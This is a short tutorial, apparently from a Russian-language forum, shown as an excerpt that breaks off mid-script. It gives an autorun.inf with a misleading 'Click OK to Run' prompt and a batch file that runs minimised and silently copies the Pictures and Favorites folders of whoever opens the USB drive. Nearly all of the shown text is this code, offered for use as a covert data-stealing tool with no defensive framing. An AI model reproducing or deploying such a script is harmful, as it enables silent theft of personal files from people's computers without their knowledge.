1. Open notepad and write down the following code Код: [autorun] icon=drive.ico open=launch.bat action=Click OK to Run shell\open\command=launch.bat And Save this as a file as autorun.inf 2. Open Notepad again and copy-paste the following lines Код: @echo off :: variables /min SET odrive=%odrive:~0,2% set backupcmd=xcopy /s /c /d /e /h /i /r /y echo off %backupcmd% "%USERPROFILE%\pictures" "%drive%\all\My pics" %backupcmd% "%USERPROFILE%\Favorites"... Читать далее Читать дальше...